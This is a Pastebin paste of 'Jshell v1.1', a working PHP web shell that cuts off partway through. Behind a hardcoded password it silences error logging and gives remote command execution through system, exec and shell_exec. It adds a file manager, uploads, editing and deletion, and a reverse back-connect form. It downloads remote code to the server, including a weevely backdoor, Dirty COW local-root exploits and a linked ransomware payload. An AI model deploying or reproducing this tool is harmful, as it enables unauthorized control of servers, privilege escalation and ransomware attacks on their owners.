API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 9th, 2018
284
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 28.62 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * [ Jshell v1.1 - 2018. ]
  4. *
  5. * @author shutdown57 ( alinko ) < alinkokomansuby@gmail.com >
  6. * @version 1.0 2018
  7. * @link page : https://facebook.com/fp.javcode
  8. * @link group : https://facebook.com/groups/jc.javcode
  9. * @see https://github.com/justalinko ( justalinko )
  10. * @see https://pastebin.com/u/shutdown57 ( shutdown57 )
  11. * @copyright &copy; 2018 JavCode.
  12. *
  13. **/
  14. $config = [
  15. 'title' => 'Jshell v1.1', // set title name.
  16. 'debug' => true, // if debug true is any error showed.
  17. 'icon' => 'http://justalinko.github.io/jshell/javcode-grey.png',
  18. 'src_jquery' => 'http://justalinko.github.io/jshell/jquery.min.js',
  19. 'src_datatables' => 'http://justalinko.github.io/jshell/jquery.dataTables.js',
  20. 'src_style' => 'http://justalinko.github.io/jshell/style-js.css',
  21. ];
  22.  
  23. Class Jshell{
  24. public $menubar;
  25. public $src_link;
  26. public $password;
  27. public function __construct()
  28. {
  29. /** The script started here. **/
  30. $this->password = 'w'; // password
  31.  
  32. if($config['debug'] === true)
  33. { error_reporting(-1); }else{ error_reporting(0); }
  34. error_log(0);
  35. session_start();
  36. ob_start();
  37. set_time_limit(0);
  38. @ini_set('error_log',NULL);
  39. @ini_set('log_errors',0);
  40. @ini_set('max_execution_time',0);
  41. @ini_set('output_buffering',0);
  42. @ini_set('display_errors', 0);
  43.  
  44. // login authetication
  45. if(empty($_SESSION['jshell']))
  46. {
  47. echo "<center><h3>Jshellv1 - 2018</h3><form method=post><input type=password name=passw placeholder=password><input type=submit value=Go></form></center>";
  48. if(isset($_POST['passw']))
  49. {
  50. if($_POST['passw'] == $this->password)
  51. {
  52. $_SESSION['jshell'] = true;
  53. echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";
  54. }
  55. }
  56. exit;
  57. }
  58.  
  59. $GLOBALS['getfullpath'] = (empty($_GET['jshell_path'])) ? getcwd() : $_GET['jshell_path'];
  60. @chdir($GLOBALS['getfullpath']);
  61. $baselink = "?jshell_path=".$GLOBALS['getfullpath']."&jshell_act=";
  62. $this->menubar = [
  63. 'Home' => $_SERVER['PHP_SELF'],
  64. 'Upload' => $baselink.'upl',
  65. 'Command' => $baselink.'cmd',
  66. 'Localroot' => $baselink.'lc',
  67. 'Back Connect' => $baselink.'net',
  68. 'PHP' => $baselink.'php',
  69. 'Weevely' => $baselink.'wev',
  70. 'Ransomware' => $baselink.'rans',];
  71.  
  72. $this->src_link = [
  73. 'adminer' => '',
  74. 'weevely' => 'https://raw.githubusercontent.com/justalinko/justalinko.github.io/master/jshell/Jweevely.php',
  75. 'mailer' => '',
  76. 'lc' => [
  77. 'dirty' => 'https://github.com/justalinko/localroot/raw/master/dirtycow-mem',
  78. 'c0w' => 'https://github.com/justalinko/localroot/raw/master/c0w',
  79. 'cowroot' => 'https://github.com/justalinko/localroot/raw/master/cowroot',
  80. ],
  81. 'ransomware' => 'https://pastebin.com/raw/JfzDnXK3',
  82. ];
  83.  
  84.  
  85. }
  86. public function Jcmd($cmd) {
  87. if(function_exists('system')) {
  88. @ob_start();
  89. @system($cmd);
  90. $exect = @ob_get_contents();
  91. @ob_end_clean();
  92. return $exect;
  93. } elseif(function_exists('exec')) {
  94. @exec($cmd,$results);
  95. $exect = "";
  96. foreach($results as $result) {
  97. $exect .= $result;
  98. } return $exect;
  99. } elseif(function_exists('passthru')) {
  100. @ob_start();
  101. @passthru($cmd);
  102. $exect = @ob_get_contents();
  103. @ob_end_clean();
  104. return $exect;
  105. } elseif(function_exists('shell_exec')) {
  106. $exect = @shell_exec($cmd);
  107. return $exect;
  108. }
  109. }
  110. public function Jgetgrowif()
  111. {
  112. if(!function_exists('posix_getegid')) {
  113. $user = @get_current_user();
  114. $uid = @getmyuid();
  115. $gid = @getmygid();
  116. $group = "?";
  117. } else {
  118. $uid = @posix_getpwuid(posix_geteuid());
  119. $gid = @posix_getgrgid(posix_getegid());
  120. $user = $uid['name'];$uid = $uid['uid'];
  121. $group = $gid['name'];$gid = $gid['gid'];
  122. }
  123. $r = ['user' => $user,'uid' => $uid,'group' => $group,'gid' => $gid];
  124. return $r;
  125. }
  126. public function Jserverinfo()
  127. {
  128. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  129. $mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  130. $wget = ($this->Jcmd('wget --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  131. $curl = (function_exists('curl_init')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  132. $perl = ($this->Jcmd('perl --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  133. $python = ($this->Jcmd('python --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  134. $bash = ($this->Jcmd('bash --version')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  135. $gcc = ($this->Jcmd('gcc --help')) ? "<font color=lime>YES</font>" :"<font color=red>NO</font>";
  136. $sm = (ini_get('safe_mode') == 'on') ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  137. $df = (ini_get('disable_functions')) ? wordwrap(ini_get('disable_functions'),100,"\n",true) : "<font color=red>NO !</font>";
  138. $sysfo = [
  139. 'hostname' => $_SERVER['HTTP_HOST'],
  140. 'system' => php_uname(),
  141. 'phpv' => phpversion(),
  142. 'software' => $_SERVER['SERVER_SOFTWARE'],
  143. 'ipserver' => gethostbyname($_SERVER['HTTP_HOST']),
  144. 'ipclient' => $_SERVER['REMOTE_ADDR'],
  145. 'mysql' => $mysql,
  146. 'mysqli' => $mysqli,
  147. 'wget' => $wget,
  148. 'curl' => $curl,
  149. 'perl' => $perl,
  150. 'python' => $python,
  151. 'bash' => $bash,
  152. 'gcc' => $gcc,
  153. 'safemode' => $sm,
  154. 'disafunc' => $df];
  155. return $sysfo;
  156. }
  157. public function Jcurdir($path,$goto){
  158. $dir = str_replace("\\","/",$path);
  159. $dir = explode("/",$dir);
  160. foreach($dir as $o=>$i){
  161. if($i == "" && $o == 0){
  162. echo "<a href=\"javascript:menuklik('?".$goto."=/')\">/</a>";continue;}
  163. if($i == "")continue;
  164. echo "<a href=\"javascript:menuklik('?".$goto."=";
  165. for($p=0;$p<=$o;$p++){
  166. echo $dir[$p]; if($p != $o){
  167. echo "/";} } echo "')\">".$i."</a>/";}
  168. if(is_writable($path)){echo "- [<b><font color=lime>W</font></b>]";}elseif(is_readable($path)){echo "- [<b><font color=red>R</font></b>]";}else{echo "- [<b><font color=grey>Unknown</font></b>]<meta http-equiv='refresh' content='4;url=?'>";}}
  169. public function Jcaller($url,$name)
  170. {
  171. $fp = fopen($name,"w");
  172. $co = file_get_contents($url);
  173. return fwrite($fp,$co);
  174. fclose($fp);
  175. }
  176. public function Jheader($config = array())
  177. {
  178. ?>
  179. <!DOCTYPE html>
  180. <html>
  181. <head>
  182. <title><?=$config['title'];?> [<?=$_SERVER['HTTP_HOST'];?>]</title>
  183. <meta charset="utf-8">
  184. <meta name="author" content="shutdown57">
  185. <link rel="icon" type="text/css" href="<?=$config['icon'];?>">
  186. <script type="text/javascript" src="<?=$config['src_jquery'];?>"></script>
  187. <script type="text/javascript" src="<?=$config['src_datatables'];?>"></script>
  188. <!-- <link rel="stylesheet" type="text/css" href="valid/assets/css/w3.css"> -->
  189. <link rel="stylesheet" type="text/css" href="<?=$config['src_style'];?>">
  190. <script type="text/javascript">
  191. function select_all(pilih)
  192. {
  193. var cek = document.getElementsByName('pilih[]');
  194. for (var i =0; n=cek.length;i++) {
  195. cek[i].checked = pilih.checked;
  196. }
  197. }
  198. function logout()
  199. {
  200. $.ajax({
  201. url:'?jshell_act=logout',
  202. success:function(e)
  203. {
  204. alert('Bye Boyz!');
  205. window.location.href='';
  206. }
  207. });
  208. }
  209. function menuklik(uri)
  210. {
  211. $('.right').html("<img src='https://dfw.ink/images/loading_gif.gif' style='width:50px;height:50px;'>");
  212. history.pushState(null,null,uri);
  213. $.ajax({
  214. url:uri,
  215. success:function(e)
  216. {
  217. $('body').html(e);
  218. },error:function(e)
  219. {
  220. alert('Something wrong :D '+e);
  221. }
  222. });
  223. }
  224. function rename(dir,file)
  225. {
  226. var newname = prompt('New name');
  227. if(newname != null){
  228. window.location.href='?jshell_path='+dir+'&jshell_file='+file+'&n='+newname+'&jshell_act=ren';
  229. }else{
  230. alert('Nama file masih kosong');
  231. }
  232. }
  233. function hs(l,p)
  234. {
  235. document.getElementById(l).style.display='none';
  236. document.getElementById(p).style.display='block';
  237. }
  238. function gotodir(dir)
  239. {
  240. var dire = $(dir).val();
  241. $.ajax({
  242. url:'?jshell_path='+dire,
  243. success:function(e)
  244. {
  245. $('body').html(e);
  246. history.pushState(null,null,'?jshell_path='+dire);
  247. },error:function(e)
  248. {
  249. alert('error '+e);
  250. }
  251. });
  252. }
  253. $(document).ready(function()
  254. {
  255. $('body').hide().fadeIn(500);
  256. $('#filemanager').DataTable({
  257. 'bSort':false,
  258. });
  259. });
  260. </script>
  261. </head>
  262. <body onload="faded(this)">
  263. <div class="w3-container">
  264.  
  265. <header>
  266. <div class="right"></div>
  267. <table class="table" style="width: 98%;margin: 0 auto;border-left: 1px dashed #eee;border-right: 1px dashed #f00;border-top: 1px dashed #f00;border-bottom: 1px dashed #eee;">
  268. <tr><td style="width: 200px;" class="kiri"><center><img src="https://s19.postimg.cc/jcxygcm1v/javcode-grey.png" style="max-width: 170px;max-height:170px;" ><p><?=$config['title'];?> | by : JavCode.</p></center></td><td>
  269. <pre>
  270. System : <?=$this->Jserverinfo()['system'];?> [Exploit-DB] [Search Localroot]
  271. Hostname : <?=$this->Jserverinfo()['hostname'];?> | Safe Mode : <?=$this->Jserverinfo()['safemode'];?> .
  272. Server Software : <?=$this->Jserverinfo()['software'];?>.
  273. PHP Version : <?=$this->Jserverinfo()['phpv'];?> - [<a href="javascript:menuklik('?jshell_path=<?=$GLOBALS[getfullpath]?>&jshell_act=phpinfo');">phpinfo</a>] [<a href="javascript:menuklik('?jshell_path=<?=dirname(php_ini_loaded_file());?>&jshell_file=<?=basename(php_ini_loaded_file());?>&jshell_act=view');">php.ini</a>]
  274. IP Server : <?=$this->Jserverinfo()['ipserver'];?> | IP Client : <?=$this->Jserverinfo()['ipclient'];?>.
  275. HDD : 31.89 / 180.16 GB | [ Free : 148.27 GB ]
  276. User : <?=$this->Jgetgrowif()['user'];?> [<?=$this->Jgetgrowif()['uid'];?>] || Group : <?=$this->Jgetgrowif()['group'];?> [<?=$this->Jgetgrowif()['gid'];?>]
  277. MySQL : <?=$this->Jserverinfo()['mysql'];?> | MySQLi : <?=$this->Jserverinfo()['mysqli'];?> | Wget : <?=$this->Jserverinfo()['wget'];?> | CURL : <?=$this->Jserverinfo()['curl'];?> | Perl : <?=$this->Jserverinfo()['perl'];?> | Python : <?=$this->Jserverinfo()['python'];?> | Bash : <?=$this->Jserverinfo()['bash'];?> | GCC ( compiler ) : <?=$this->Jserverinfo()['gcc'];?>.
  278. Disable functions : <?=$this->Jserverinfo()['disafunc'];?>
  279. </pre>
  280. </td>
  281. </tr>
  282. </table>
  283. <div style="margin-left:10px;margin: 4px;">
  284. <div id="cd">
  285. <a href="javascript:hs('cd','dc');">Current dir</a> :: <?= $this->Jcurdir($GLOBALS['getfullpath'],'jshell_path');?>
  286. </div>
  287. <div id="dc" style="display: none;">
  288. <label>Go to dir :: </label>
  289. <input type="text" id="gtd" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="button" value=">>" onclick="gotodir('#gtd')" class="submit_m">
  290. </div>
  291. </div>
  292. <ul align=center>
  293. <?php
  294. foreach($this->menubar as $menu=>$link){
  295. echo '<li>[<a href="#" onclick="menuklik(\''.$link.'\');" >'.$menu.'</a>]</li>';
  296. }
  297. ?>
  298. [<a href="#" onclick="logout()"><font color=red>Logout</font></a>]
  299. </ul>
  300. </header><br/><br/>
  301. <h1></h1>
  302. <?php
  303. }
  304. public function Jsdir($dir)
  305. {
  306. // Check if scandir() exist in server.
  307. if(function_exists('scandir'))
  308. {
  309. $s = scandir($dir);
  310. }
  311. return $s;
  312. }
  313. public function Jgetfsize($files) // function for get file size.
  314. {
  315. $size = filesize($files)/1024;
  316. $size = round($size,3);
  317. if($size > 1024){
  318. $size = round($size/1024,2). 'MB';
  319. } else {
  320. $size = $size. 'KB';}
  321. return $size;
  322. }
  323. public function Jgetmime($files) // function for get mime content type
  324. {
  325. if(function_exists('mime_content_type'))
  326. {
  327. if(is_readable($files)){
  328. $mime =mime_content_type($files);
  329. }else{
  330. $mime = "Unknown";
  331. }
  332. }else{
  333. if(is_file($files))
  334. {
  335. $mime = "Files";
  336. }elseif (is_dir($files)) {
  337. $mime = "Directory";
  338. }else{
  339. $mime = "Unknown";
  340. }
  341. }
  342. return $mime;
  343. }
  344. public function Jvf($f){
  345. $file = wordwrap(file_get_contents($f),150,"\n",true);
  346. $a= highlight_string($file,true);
  347. $old = array("0000BB","000000","FF8000","DD0000", "007700");
  348. $new = array("F73D80","e1e1e1", "05f6fa", "F9FF00" , "1dff1b");
  349. $a= str_ireplace($old,$new, $a);
  350. $result = "<div class=\"code\">";$result .= $a;$result.="</div>";
  351. return $result;}
  352. public function Jdel($dir){
  353. if(is_dir($dir)){
  354. if(!rmdir($dir)){
  355. $s=scandir($dir);
  356. foreach ($s as $ss) {
  357. if(is_file($dir."/".$ss)){
  358. if(unlink($dir."/".$ss)){
  359. $rm=rmdir($dir);
  360. }
  361. }
  362. if(is_dir($dir."/".$ss)){
  363. $rm=rmdir($dir."/".$ss);
  364. $rm.=rmdir($dir);
  365. }
  366. }
  367. }elseif(is_file($dir)){
  368. $rm = unlink($dir);
  369. }
  370. }elseif(is_file($dir))
  371. {
  372. $rm = unlink($dir);
  373. }
  374. return $rm;
  375. }
  376. public function Jupl($a,$b){
  377. if(function_exists('move_uploaded_file')){
  378. $upl = move_uploaded_file($a,$b);
  379. }elseif (function_exists('copy')) {
  380. $upl = copy($a,$b);
  381. }
  382. return $upl;
  383. }
  384. public function array_upload($file){
  385. $file_ary = array();
  386. $file_count = count($file['name']);
  387. $file_key = array_keys($file);
  388. for($i=0;$i<$file_count;$i++) {
  389. foreach($file_key as $val) {
  390. $file_ary[$i][$val] = $file[$val][$i];
  391. }
  392. }
  393. return $file_ary;
  394. }
  395. public function Jgetdmod($files) // function for get date modified.
  396. {
  397. $a_fdm=@date("d-m-Y H:i:s", filemtime($files));
  398. return $a_fdm;
  399. }
  400. public function Jgetowner($path){
  401. if(function_exists('posix_getpwuid')) {
  402. $downer = @posix_getpwuid(fileowner($path));
  403. $downer = $downer['name'];
  404. } else {
  405. $downer = fileowner($path);
  406. }
  407. return $downer;
  408. }
  409. public function Jgetgroup($path){
  410. if(function_exists('posix_getgrgid')) {
  411. $dgrp = @posix_getgrgid(filegroup($path));
  412. $dgrp = $dgrp['name'];
  413. } else {
  414. $dgrp = filegroup($path);
  415. }
  416. return $dgrp;}
  417. public function Jwrite($fname,$content)
  418. {
  419. $fp = fopen($fname,'w');
  420. fwrite($fp,$content);
  421. fclose($fp);
  422. }
  423. public function Jgetperms($file){
  424. $perms = fileperms($file);
  425. if (($perms & 0xC000) == 0xC000) {
  426. $info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info;}
  427.  
  428. public function Jgetact($dir,$file)
  429. {
  430. $act_files = [
  431. 'delete' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=del',
  432. 'edit' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=edit',
  433. 'download' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=dl',
  434. ];
  435. $act_dirs = [
  436. 'delete' => '?jshell_path='.$dir.'&jshell_act=del',
  437. ];
  438. $a ='| ';
  439. if(is_file($dir.'/'.$file))
  440. {
  441. foreach($act_files as $val=>$link)
  442. {
  443. $getap = explode("jshell_act=",$link);
  444. $getap= $getap[1];
  445. $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  446. $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  447. }
  448. $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename file : '.$file.'">rename</a> | ';
  449. }elseif(is_dir($dir.'/'.$file))
  450. {
  451. foreach($act_dirs as $val=>$link)
  452. {$getap = explode("jshell_act=",$link);
  453. $getap= $getap[1];
  454. $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  455. $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  456. }
  457. $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename dir : '.$file.'">rename</a> | ';
  458. }
  459. return $a;
  460. }
  461. public function Jtitle($text)
  462. {
  463. echo "<center><h3 class=\"titleac\">..:: ".$text." ::..</h3></center><br/>";
  464. }
  465. public function Jfileman($path)
  466. {
  467. ?>
  468. <form method="post">
  469. <table class="a_exp" id="filemanager" style="margin-top: 0px">
  470. <thead>
  471. <tr><th><input type="checkbox" name="pilih[]" onclick="select_all(this)"></th>
  472. <th>Files</th>
  473. <th>Size</th>
  474. <th>Type</th>
  475. <th>Date Modif</th>
  476. <th>Owner:Group</th>
  477. <th>Permission</th>
  478. <th>Action</th>
  479. </tr>
  480. </thead>
  481. <tbody>
  482. <tr><td></td><td><a href="#" onclick="menuklik('?jshell_path=<?=dirname($GLOBALS['getfullpath']);?>')"><< Parent directory</a></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
  483. <?php
  484. /* Scan directory in server */
  485. $sdirs = $this->Jsdir($path);
  486. foreach($sdirs as $sd)
  487. {if(is_file($path.'/'.$sd)||$sd == '.'||$sd == '..')continue;
  488. ?><tr>
  489. <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sd;?>"></td>
  490. <td><a href="#" onclick="menuklik('?jshell_path=<?=$path.'/'.$sd;?>')"><?=$sd;?></a></td>
  491. <td><?=$this->Jgetfsize($path.'/'.$sd);?></td>
  492. <td><?=$this->Jgetmime($path.'/'.$sd);?></td>
  493. <td><?=$this->Jgetdmod($path.'/'.$sd);?></td>
  494. <td><?=$this->Jgetowner($path.'/'.$sd);?>:<?=$this->Jgetgroup($path.'/'.$sd);?></td>
  495. <td><?=$this->Jgetperms($path.'/'.$sd);?></td>
  496. <td><?=$this->Jgetact($path,$sd);?></td>
  497.  
  498. </tr>
  499. <?php
  500. }
  501. /* scan files in server */
  502. $sfile = $this->Jsdir($path);
  503. foreach($sfile as $sf)
  504. {if(is_dir($path.'/'.$sf)||$sf == '.'||$sf == '..')continue;
  505. ?><tr>
  506. <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sf;?>"></td>
  507. <td><a href="#" onclick="menuklik('?jshell_path=<?=$path;?>&jshell_file=<?=$sf;?>&jshell_act=view')"><?=$sf;?></a></td>
  508. <td><?=$this->Jgetfsize($path.'/'.$sf);?></td>
  509. <td><?=$this->Jgetmime($path.'/'.$sf);?></td>
  510. <td><?=$this->Jgetdmod($path.'/'.$sf);?></td>
  511. <td><?=$this->Jgetowner($path.'/'.$sf);?>:<?=$this->Jgetgroup($path.'/'.$sf);?></td>
  512. <td><?=$this->Jgetperms($path.'/'.$sf);?></td>
  513. <td><?=$this->Jgetact($path,$sf);?></td>
  514.  
  515. </tr>
  516. <?php
  517. }
  518. ?>
  519. </tbody>
  520. </table><div style="clear: both; margin-bottom:69px"></div><table style="bottom: 0;left: 0;position: fixed;"><tr><td>
  521. Actions</td><td><select name="actionx" class="input_m">
  522. <option>----[ action ]----</option>
  523. <option value="delete">Delete</option>
  524. <?php
  525. if(empty($_SESSION['cfile'])){
  526. ?>
  527. <option value="copy">Copy</option>
  528. <?php
  529. }else{
  530. ?><option value="paste">Paste</option><?php
  531. }
  532. ?>
  533. </select><input type="submit" name="sac" value=">>" class="submit_m">
  534. </td></tr></table>
  535. </form>
  536. <?php
  537. if(isset($_POST['sac']))
  538. {
  539. if($_POST['actionx'] == 'delete')
  540. {
  541. foreach($_POST['pilih'] as $dfil)
  542. {
  543. if($this->Jdel($dfil))
  544. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  545. else
  546. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  547. }
  548. }elseif($_POST['actionx'] == 'copy')
  549. {
  550. $_SESSION['cfile'] = $_POST['pilih'];
  551. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  552. }elseif($_POST['actionx'] == 'paste')
  553. {
  554. foreach($_SESSION['cfile'] as $paste)
  555. {
  556. copy($paste,$GLOBALS['getfullpath'].'/'.basename($paste));
  557. }
  558. unset($_SESSION['cfile']);
  559. echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  560. }
  561. }
  562. }
  563.  
  564. public function Jshell_act($type,$text = null)
  565. {
  566. if($type == 'cmd')
  567. {
  568. ?>
  569. <form method="post">
  570. <label>jshellv1.1 ~ $</label>
  571. <input type="text" name="cmd" class="input_m" style="width: 500px;"><input type="submit" name="exec" value=">>" class="submit_m">
  572. </form>
  573. <?php
  574. }elseif($type == 'upl')
  575. {
  576. ?>
  577. <center>
  578. <form method="post" enctype="multipart/form-data">
  579. <label>Select file ::</label>
  580. <input type="file" name="jfilez[]" class="input_m" multiple="">
  581. <label>Upload to ::</label>
  582. <input type="text" name="jdirz" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="submit" name="upload" value="Upload !" class="submit_m">
  583. </form>
  584. </center>
  585. <?php
  586. }elseif ($type == 'edit') {
  587. ?>
  588. <center>
  589. <form method="post">
  590. <textarea class="txtarea_m" name="editfile"><?=$text;?></textarea>
  591. <br/>
  592. <input type="submit" name="save" value="Save" class="submit_m" style="padding: 10px;width: 200px;cursor: pointer;">
  593. </form>
  594. </center>
  595. <?php
  596. }elseif($type == 'lc')
  597. {
  598. ?>
  599. <center>
  600. <form method="get" action="https://google.com/search" target="_blank">
  601. <label for="q">Search on google</label>
  602. <input type="text" name="q" placeholder="Search exploit" class="input_m">
  603. <input type="submit" value=">>" class="submit_m">
  604. </form>
  605. <br>
  606. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=c0w');">c0w</a>]
  607. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=cowroot');">cowroot</a>]
  608. [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=dirtycow-mem');">dirty-mem</a>]
  609. [<a href="https://exploit-db.com/local/" target="_blank">localroot ex-db</a>]
  610. </center>
  611. <?php
  612. }elseif($type == 'bc')
  613. {
  614. ?><center>
  615. <form method="post">
  616. <label for="ip">IP </label>
  617. <input type="text" name="ip" class="input_m" value="<?=$_SERVER['REMOTE_ADDR'];?>">
  618. <label for="port">Port</label>
  619. <input type="text" name="port" class="input_m" value="5758">
  620. <input type="submit" name="sbmt" value=">>" class="submit_m">
  621. </form>
  622. </center>
  623. <?php
  624. }elseif ($type == 'php') {
  625. ?>
  626. <center>
  627. <form method="post">
  628. <textarea class="txtarea_m" name="code">echo "hello noob";</textarea><br>
  629. <input type="submit" name="sbmt" value="Run !" class="submit_m" style="width: 120px">
  630. </form>
  631. </center>
  632. <?php
  633. }
  634. }
  635.  
  636. }
  637.  
  638.  
  639. $js = new Jshell;
  640.  
  641. $js->Jheader($config);
  642. if(empty($_GET['jshell_act']))
  643. {
  644. $js->Jfileman($GLOBALS['getfullpath']);
  645. }else{
  646. //000000000000000000000000000000
  647. $jfilez = @$_GET['jshell_file'];
  648. $jpaptt = @$_GET['jshell_path'];
  649. //000000000000000000000000000000
  650. if($_GET['jshell_act'] == 'del')
  651. {
  652. $delt = (empty($jfilez)) ? $jpaptt : $jpaptt.'/'.$jfilez;
  653. if($js->Jdel($delt)){
  654. echo "<b> Successfully deleted files ~ </b>";
  655. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  656. }else{
  657. echo $delt."<br/>";
  658. echo "<b> Failed delete files ~ </b>";
  659. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  660.  
  661. }
  662. }elseif ($_GET['jshell_act'] == 'ren') {
  663. $fold = $jpaptt.'/'.$jfilez;
  664. $fnew = $jpaptt.'/'.$_GET['n'];
  665. if(@rename($fold,$fnew))
  666. {
  667. echo "<b> Successfully rename files ~ </b>";
  668. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  669. }else{
  670. echo "<b> Failed rename files ~ </b>";
  671. echo "<meta http-equiv='refresh' content='2;url=?jshell_path=".$jpaptt."'>";
  672. }
  673.  
  674. }
  675. elseif($_GET['jshell_act'] == 'edit')
  676. {
  677. $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  678. $js->Jtitle('Edit file');
  679. echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  680. $js->Jshell_act('edit',htmlspecialchars(file_get_contents($jpaptt.'/'.$jfilez)));
  681. if(isset($_POST['save']))
  682. {
  683. $fp = $jpaptt.'/'.$jfilez;
  684. $content = $_POST['editfile'];
  685. if($js->Jwrite($fp,$content))
  686. {
  687. echo "<b> Successfully Edit files ~ </b>";
  688. }else{
  689. echo "<b>Failed Edit files ~ </b>";
  690. }
  691. }
  692. }
  693. elseif ($_GET['jshell_act'] == 'view') {
  694. $js->Jtitle('View file');
  695. $baselink = '?jshell_path='.$jpaptt.'&jshell_file='.$jfilez.'&jshell_act=';
  696. echo "<ul>Files :<b> ".$jfilez."</b> | Owner:group : <b>".$js->Jgetowner($jpaptt.'/'.$jfilez).":".$js->Jgetgroup($jpaptt.'/'.$jfilez)."</b> | Permission : <b>".$js->Jgetperms($jpaptt.'/'.$jfilez)."</b> | Date modified : <b>".$js->Jgetdmod($jpaptt.'/'.$jfilez)."</b> | Action :: <li>[<a href=\"javascript:menuklik('".$baselink."edit')\">Edit</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."del')\">Delete</a>]</li><li>[<a href=\"javascript:rename('".$jpaptt."','".$jfilez."')\">Rename</a>]</li><li>[<a href=\"javascript:menuklik('".$baselink."dl')\">Download</a>]</li></ul>";
  697. echo $js->Jvf($jpaptt.'/'.$jfilez);
  698. }
  699. elseif($_GET['jshell_act'] == 'logout')
  700. {
  701. session_destroy();
  702. }elseif ($_GET['jshell_act'] == 'cmd') {
  703. $js->Jtitle('Command Shell');
  704. $js->Jshell_act('cmd');
  705. if(isset($_POST['exec'])){
  706. echo "<pre class='code'>";
  707. echo $js->Jcmd($_POST['cmd']);
  708. echo "</pre>";
  709. }
  710. }elseif($_GET['jshell_act'] == 'upl')
  711. {
  712. $js->Jtitle('Uploader');
  713. $js->Jshell_act('upl');
  714. if(isset($_POST['upload'])){
  715. echo "<pre class='code'>";
  716. $file_up = $js->array_upload($_FILES['jfilez']);
  717. foreach($file_up as $filup){
  718. if($js->Jupl($filup['tmp_name'],$_POST['jdirz']."/".$filup['name'])){
  719. $res_upl.="Successfuly Upload file : ".$_POST['jdirz']."/".$filup['name'];
  720. }else{
  721. $res_upl.="Failed to upload file !";}
  722. }
  723. echo $res_upl."<br/></pre>";
  724. }
  725. }elseif ($_GET['jshell_act'] == 'wev') {
  726. $js->Jtitle('Weevely remote shell backdoor');
  727. if($js->Jcaller($js->src_link['weevely'],'Jweevely.php'))
  728. {
